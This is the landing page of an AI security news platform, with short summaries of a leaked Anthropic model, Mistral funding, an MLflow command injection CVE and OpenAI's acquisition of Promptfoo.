The security intelligence platform for AI teams
AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.
Anthropic's Leaked "Mythos" Model Raises Dual-Use Security Concerns: An unreleased Anthropic AI model called Mythos was accidentally exposed through a configuration error, revealing advanced reasoning and coding abilities specifically aimed at cybersecurity. The model's improved capability to find and exploit software vulnerabilities, plus its ability to autonomously fix its own code problems, could enable both more sophisticated cyberattacks and better defenses.
Mistral Secures $830M for European AI Data Center: French AI startup Mistral raised $830 million in debt financing to build a Paris-area data center with thousands of Nvidia GPUs (specialized chips used for AI training) to train its large language models, aiming for 200 MW of European computing capacity by 2027.
Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where an attacker inserts malicious commands into input that gets executed) in its model serving code when deploying models with `env_manager=LOCAL`. The flaw allows attackers to execute arbitrary commands on deployment systems by inserting malicious content into the `python_env.yaml` file, which MLflow reads and uses in shell commands without validation. (CVE-2025-15379, Critical)
OpenAI is acquiring Promptfoo, a security platform that helps companies find and fix vulnerabilities in AI systems before they're deployed. The acquisition will integrate Promptfoo's testing tools into OpenAI Frontier, a platform for building AI coworkers (AI systems designed to work alongside humans), giving enterprises automated security testing, integrated safety checks in their development workflows, and compliance tracking features to handle risks like prompt injection (tricking an AI by hiding instructions in its input), jailbreaks (bypassing safety restrictions), and data leaks.
Fix: The source explicitly mentions that Frontier will include: (1) Automated security testing and red-teaming capabilities as a native platform feature to identify and remediate risks like prompt injections, jailbreaks, data leaks, tool misuse, and out-of-policy agent behaviors; (2) Security and evaluation integrated into development workflows to identify, investigate, and remediate agent risks earlier; and (3) Integrated reporting and traceability to document testing, monitor changes over time, and meet governance and compliance requirements.
OpenAI Blog